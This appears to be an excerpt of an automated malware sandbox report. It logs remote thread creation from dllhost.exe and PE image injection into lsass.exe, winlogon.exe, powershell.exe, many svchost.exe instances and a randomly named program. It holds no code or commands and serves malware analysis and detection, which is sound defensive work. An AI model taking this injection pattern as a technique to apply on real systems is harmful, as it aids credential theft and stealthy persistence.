Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: EB272E64
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: 9FF42E64
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: B8522E64
Source: C:\Windows\System32\dllhost.exe Thread created: C:\Windows\System32\dwm.exe EIP: AF1A2E64
Source: C:\Windows\System32\dllhost.exe Thread created: C:\Windows\System32\svchost.exe EIP: 87992E64
Source: C:\Windows\System32\dllhost.exe Thread created: C:\Windows\System32\svchost.exe EIP: 53772E64
Source: C:\Windows\System32\dllhost.exe Thread created: C:\Windows\System32\svchost.exe EIP: 5D532E64
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: 67D2E64
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: 5B392E64
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: EBFD2E64
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: 59042E64
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: A9E72E64
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: 73162E64
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: 4E862E64
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: 473C2E64
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: 6F9D2E64
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: 83BC2E64
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: D3F72E64
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: A4152E64
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: BDF32E64
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: C0262E64
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: C9F32E64
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: 645B2E64
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: 7B2A2E64
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: 4F62E64
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: 2AB42E64
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: 4ADB2E64
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: 1992E64
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: 25DA2E64
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: F5352E64
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: F0D62E64
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: FFB2E64
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: C2572E64
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: 8BA92E64
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: 66902E64
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: 13EF2E64
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: 8D572E64
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: 69B42E64
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: CC742E64
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: 5DA72E64
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: 199D2E64
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: F3892E64
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: 3B82E64
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: 40E42E64
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: A6532E64
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: 27BC2E64
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: 7B152E64
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: 621A2E64
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: 2F482E64
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: 8B4B2E64
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: 683D2E64
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: 1352E64
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: 2E262E64
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: 6C5E2E64
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: D5932E64
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: FC652E64
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: 777C2E64
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: 33B42E64
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: 8D0A2E64
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: AB4C2E64
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: 2A642E64
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: 6CF32E64
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: 641A2E64
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: 49352E64
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: 60D82E64
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: 5E7B2E64
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: A1602E64
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: 2F7C2E64
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: E8152E64
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: 52342E64
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: 9DAC2E64
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: 602E2E64
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: 7F232E64
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: 7AF92E64
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: 80852E64
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: A3142E64
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: 3C72570
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: E53C2E64
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: 1BCE2E64
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: 5F2570
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: 602570
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: 762570
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: 902570
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: 1052570
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: 532570
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: 1032570
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: 6A2570
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: CC2570
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: 1132570
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: 1082570
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: DA2570
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: E72570
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: E12570
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: CA2570
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: 762570
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: 14A2570
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: 11B2570
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: 13C2570
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: 1222570
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: DB2570
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: 702570
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: 502570
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: AC2570
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: 9D2570
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: 7A2570
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: E62570
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: 3A2570
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: B32570
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: E12570
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: FF2570
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: 1502570
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: 1302570
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: B82570
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: 1212570
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: 9E2570
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: 902570
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: 9C2570
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: AA2570
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: 692570
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: 1132570
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: 1112570
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: BF2570
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: 7D2570
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: CC2570
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: 9A2570
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: 5B2570
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: B12570
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: 1352570
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: F52570
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: B72570
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: 7B2570
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: F92570
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: 1142570
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: 622570
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: DE2570
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: 1212570
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: C62570
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: 7C2570
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: A52570
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: 192570
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: 602570
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: 1132570
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: 152570
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: FD2570
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: 5D2570
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: 832570
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: D22570
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: 902570
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: 1252570
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: 3A2570
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: 11F2570
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: 9F2570
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: F42570
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: 172570
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: 942570
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: 1B2570
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: 622570
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: 11F2570
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: 692570
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: A22570
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: C72570
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: D32570
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: EE2570
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: 3C2570
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: B12570
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: C62570
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: 6E2570
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: 1062570
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: 7A2570
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: 1132570
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: E62570
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: C72570
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: 182570
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: A02570
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: 442D2E64
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: 8B1C2E64
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: F9952E64
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: 9D662E64
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: 91452E64
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: C3DC2E64
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: C4F2E64
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: AB62E64
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: EB272E64
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: 9FF42E64
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: B8522E64
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: EB2F3E68
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: F3B42E64
Source: C:\Windows\System32\dllhost.exe Thread created: unknown EIP: F3EC2E64
Injects a PE file into a foreign processes
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Memory written: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe base: 400000 value starts with: 4D5A
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Memory written: C:\Windows\System32\dllhost.exe base: 140000000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\winlogon.exe base: 225DC610000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\winlogon.exe base: 225DC640000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\lsass.exe base: 202C0AB0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\lsass.exe base: 202C0AE0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\svchost.exe base: 2A6612D0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\svchost.exe base: 2A661300000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\dwm.exe base: 2BAAF1A0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\dwm.exe base: 2BAAF230000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\svchost.exe base: 26A87990000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\svchost.exe base: 17953770000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\svchost.exe base: 2295D530000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\svchost.exe base: 253067D0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\svchost.exe base: 1845B390000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\svchost.exe base: 1ADEBFD0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\svchost.exe base: 1D559040000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\svchost.exe base: 241A9E70000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\svchost.exe base: 1CD73160000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\svchost.exe base: 2824E860000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\svchost.exe base: 21B473C0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\svchost.exe base: 2086F9D0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\svchost.exe base: 17183BC0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\svchost.exe base: 23FD3F70000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\svchost.exe base: 1D2A4150000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\svchost.exe base: 275BDF30000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\svchost.exe base: 1AAC0260000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\svchost.exe base: 203C9F30000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\svchost.exe base: 1B5645B0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\svchost.exe base: 1BB7B2A0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\svchost.exe base: 1C004F60000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\svchost.exe base: 24E2AB40000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\svchost.exe base: 2644ADB0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\spoolsv.exe base: 1990000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\svchost.exe base: 20D25DA0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\svchost.exe base: 26EF5350000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\svchost.exe base: 2A7F0D60000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\svchost.exe base: 23D0FFB0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\svchost.exe base: 1B1C2570000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\svchost.exe base: 2108BA90000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\svchost.exe base: 29166900000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files\Common Files\microsoft shared\ClickToRun\OfficeClickToRun.exe base: 21C13EF0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\svchost.exe base: 1988D570000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\svchost.exe base: 13869B40000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\svchost.exe base: 1E1CC740000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\svchost.exe base: 2855DA70000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\svchost.exe base: 2BF199D0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\svchost.exe base: 15AF3890000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\svchost.exe base: 21A03B80000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\sihost.exe base: 1CD40E40000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\svchost.exe base: 151A6530000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\svchost.exe base: 19E27BC0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\svchost.exe base: 17D7B150000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\svchost.exe base: 1BE621A0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\svchost.exe base: 2252F480000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\ctfmon.exe base: 1F28B4B0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\svchost.exe base: 184683D0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\explorer.exe base: 1350000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\svchost.exe base: 1972E260000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\dasHost.exe base: 2246C5E0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\svchost.exe base: 221D5930000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\RuntimeBroker.exe base: 1ECFC650000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\RuntimeBroker.exe base: 1D1777C0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\svchost.exe base: 1A633B40000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\svchost.exe base: 2928D0A0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\dllhost.exe base: 13DAB4C0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\smartscreen.exe base: 1A22A640000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\svchost.exe base: 21C6CF30000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\wbem\WmiPrvSE.exe base: 1EF641A0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\audiodg.exe base: 1D349350000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\RuntimeBroker.exe base: 23B60D80000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\RuntimeBroker.exe base: 2135E7B0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\svchost.exe base: 1DEA1600000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\svchost.exe base: 1F22F7C0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\ApplicationFrameHost.exe base: 1F6E8150000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\RuntimeBroker.exe base: 20C52340000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\ImmersiveControlPanel\SystemSettings.exe base: 2589DA90000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\oobe\UserOOBEBroker.exe base: 1F5602E0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\wbem\WmiPrvSE.exe base: 1E97F230000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\svchost.exe base: 1217AF90000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\svchost.exe base: 1A680850000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\conhost.exe base: 192A3140000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\SysWOW64\wbem\WmiPrvSE.exe base: 3C70000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\dllhost.exe base: 294E53C0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\RuntimeBroker.exe base: 2B83DFA0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Windows\System32\RuntimeBroker.exe base: 1661BCE0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\iHPNvmnLELxfyVUCfJQyNbSnVMCwhlAlueSlMTCbPvwTvfHpABuhYFQGVnnNUhNJPZWua\nPUCJvROIvVxBMv.exe base: 5F0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\iHPNvmnLELxfyVUCfJQyNbSnVMCwhlAlueSlMTCbPvwTvfHpABuhYFQGVnnNUhNJPZWua\nPUCJvROIvVxBMv.exe base: 600000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\iHPNvmnLELxfyVUCfJQyNbSnVMCwhlAlueSlMTCbPvwTvfHpABuhYFQGVnnNUhNJPZWua\nPUCJvROIvVxBMv.exe base: 760000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\iHPNvmnLELxfyVUCfJQyNbSnVMCwhlAlueSlMTCbPvwTvfHpABuhYFQGVnnNUhNJPZWua\nPUCJvROIvVxBMv.exe base: 900000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\iHPNvmnLELxfyVUCfJQyNbSnVMCwhlAlueSlMTCbPvwTvfHpABuhYFQGVnnNUhNJPZWua\nPUCJvROIvVxBMv.exe base: 1050000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\iHPNvmnLELxfyVUCfJQyNbSnVMCwhlAlueSlMTCbPvwTvfHpABuhYFQGVnnNUhNJPZWua\nPUCJvROIvVxBMv.exe base: 530000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\iHPNvmnLELxfyVUCfJQyNbSnVMCwhlAlueSlMTCbPvwTvfHpABuhYFQGVnnNUhNJPZWua\nPUCJvROIvVxBMv.exe base: 1030000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\iHPNvmnLELxfyVUCfJQyNbSnVMCwhlAlueSlMTCbPvwTvfHpABuhYFQGVnnNUhNJPZWua\nPUCJvROIvVxBMv.exe base: 6A0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\iHPNvmnLELxfyVUCfJQyNbSnVMCwhlAlueSlMTCbPvwTvfHpABuhYFQGVnnNUhNJPZWua\nPUCJvROIvVxBMv.exe base: CC0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\iHPNvmnLELxfyVUCfJQyNbSnVMCwhlAlueSlMTCbPvwTvfHpABuhYFQGVnnNUhNJPZWua\nPUCJvROIvVxBMv.exe base: 1130000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\iHPNvmnLELxfyVUCfJQyNbSnVMCwhlAlueSlMTCbPvwTvfHpABuhYFQGVnnNUhNJPZWua\nPUCJvROIvVxBMv.exe base: 1080000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\iHPNvmnLELxfyVUCfJQyNbSnVMCwhlAlueSlMTCbPvwTvfHpABuhYFQGVnnNUhNJPZWua\nPUCJvROIvVxBMv.exe base: DA0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\iHPNvmnLELxfyVUCfJQyNbSnVMCwhlAlueSlMTCbPvwTvfHpABuhYFQGVnnNUhNJPZWua\nPUCJvROIvVxBMv.exe base: E70000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\iHPNvmnLELxfyVUCfJQyNbSnVMCwhlAlueSlMTCbPvwTvfHpABuhYFQGVnnNUhNJPZWua\nPUCJvROIvVxBMv.exe base: E10000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\iHPNvmnLELxfyVUCfJQyNbSnVMCwhlAlueSlMTCbPvwTvfHpABuhYFQGVnnNUhNJPZWua\nPUCJvROIvVxBMv.exe base: CA0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe Memory written: C:\Program Files (x86)\iHPNvmnLELxfyVUCfJQyNbSnVMCwhlAlueSlMTCbPvwTvfHpABuhYFQGVnnNUhNJPZWua\nPUCJvROIvVxBMv.exe base: 760000 value starts with: 4D5A
